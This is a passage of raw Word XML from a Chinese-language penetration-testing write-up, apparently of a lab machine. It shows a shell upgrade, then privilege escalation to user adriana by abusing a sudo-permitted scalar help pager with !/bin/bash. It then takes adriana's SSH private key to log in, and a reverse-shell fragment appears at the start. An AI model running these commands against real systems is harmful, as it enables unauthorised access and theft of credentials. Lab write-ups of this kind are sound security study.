        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:r w:rsidR="002072C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="002072C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="002072C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>前均为两个空格）</w:t>
      </w:r>
      <w:r w:rsidR="00BC4260">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00371BDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="00371BDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在获得</w:t>
      </w:r>
      <w:r w:rsidR="00371BDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00371BDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以后输入命令</w:t>
      </w:r>
      <w:r w:rsidR="00371BDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r w:rsidR="003F111F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-qc </w:t>
      </w:r>
      <w:r w:rsidR="003F111F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="003F111F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F111F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F111F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="003F111F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/null</w:t>
      </w:r>
      <w:r w:rsidR="007202C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以获得一个交互式</w:t>
      </w:r>
      <w:r w:rsidR="00406A04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="007202C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE13B36" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00371BDD" w:rsidP="00A96360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652B7C09" wp14:editId="1B76561E">
            <wp:extent cx="4552950" cy="1095375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="91361280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12803" name="图片 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2EAF" w14:textId="04436953" w:rsidR="00371BDD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20</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC35BB" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00371BDD" w:rsidP="00A96360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DE42BE3" wp14:editId="09619E9D">
            <wp:extent cx="5274310" cy="605155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="536882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826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98F7" w14:textId="567F228A" w:rsidR="00371BDD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21</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57023D7B" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00371BDD" w:rsidP="00A96360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F59E8BA" wp14:editId="0C45B839">
            <wp:extent cx="5274310" cy="992505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="206813378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33785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19C8" w14:textId="13229061" w:rsidR="009159FA" w:rsidRDefault="00A96360" w:rsidP="00A96360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22</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C82AC" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00E0687B" w:rsidP="00A96360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8CCE2D0" wp14:editId="47B6CE68">
            <wp:extent cx="5274310" cy="421005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="839317401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17401" name="图片 1" descr="图形用户界面&#10;&#10;中度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6D71" w14:textId="08FF7689" w:rsidR="00E0687B" w:rsidRPr="000826C4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23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F996A09" w14:textId="77777777" w:rsidR="007C0460" w:rsidRDefault="00F7049B" w:rsidP="001B0FF8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权限提升</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340AD0F7" w14:textId="7E153B85" w:rsidR="000303FA" w:rsidRDefault="00440B55" w:rsidP="007C0460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-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获取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adriana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBB34C" w14:textId="4B73132D" w:rsidR="00440B55" w:rsidRDefault="00440B55" w:rsidP="00440B55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-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看当前用户的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权限，发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户可以无需密码以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driana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用户身份运行</w:t>
      </w:r>
      <w:r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usr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bin/scalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>并不是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linux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常见的自带可执行文件，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中搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现这是微软的一个用于管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的软件，其运行方式类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，因此可以尝试通过对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的攻击方式攻击。在</w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00054DB1">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网站中搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发现其存在一个可利用漏洞是在查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>内容太多导致需要通过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分页器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来逐行查看文件内容，此时的文件会被逐行解释，在解释时输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和待执行命令会以运行该文件的用户身份执行。输入命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D69DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D69DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D69DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>adriana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D69DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D69DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D69DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/bin/scalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>尝试运行发现其也存在一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B549F62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E5618D3" wp14:editId="18030975">
            <wp:extent cx="5274310" cy="1078230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="34597911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84232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4233" w14:textId="1EF01F3F" w:rsidR="00440B55" w:rsidRDefault="00A96360" w:rsidP="00A96360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24</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116B09A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78E86D3" wp14:editId="41D724C5">
            <wp:extent cx="5274310" cy="4403725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="884782851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91821" name="图片 1" descr="图形用户界面, 文本, 应用程序, Word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8554" w14:textId="37DB77A5" w:rsidR="00440B55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25</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D592B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5AA646B" wp14:editId="24DB4852">
            <wp:extent cx="5274310" cy="3588385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="75380693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09991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C973" w14:textId="31BCEE3F" w:rsidR="00440B55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26</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62902AA9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B72378D" wp14:editId="37C9D3D2">
            <wp:extent cx="5274310" cy="1758315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="40189055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45279" name="图片 1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3C4" w14:textId="76A2C08E" w:rsidR="00440B55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27</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52873884" w14:textId="5CC21161" w:rsidR="00440B55" w:rsidRPr="005E3493" w:rsidRDefault="00440B55" w:rsidP="00440B55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命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E565E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E565E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E565E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uadriana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E565E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E565E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E565E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/bin/scalar help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后接着输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，成功获得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driana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用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。进入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driana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用户家目录，发现存在一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件，进入后发现存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>私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钥</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>id_rsa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，保存该私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钥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到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，并使用命令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chmod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600 .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s_rsa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改变当前私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钥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权限，然后输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssh -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d_rsa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</w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00054DB1">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>adriana@192.168.6.173</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>连接到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driana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。（这里由于是从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中获取的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，所以有很多命令执行时受限，需要重新获得一个不受限的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADCDDB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4CFF096" wp14:editId="484D8767">
            <wp:extent cx="5274310" cy="1447165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="84940177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44931" name="图片 1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F047" w14:textId="0DD6F00D" w:rsidR="00440B55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28</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB9ED3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1505D3F" wp14:editId="63162A21">
            <wp:extent cx="5274310" cy="2968625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="53225747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88448" name="图片 1" descr="图形用户界面, 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A2D8" w14:textId="1F60AD83" w:rsidR="00440B55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29</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="605B851E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45B1192" wp14:editId="14BE0939">
            <wp:extent cx="4953000" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1258218038" name="图片 1" descr="电脑萤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17223" name="图片 1" descr="电脑萤幕&#10;&#10;中度可信度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0426" w14:textId="5C3C3C96" w:rsidR="00440B55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30</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
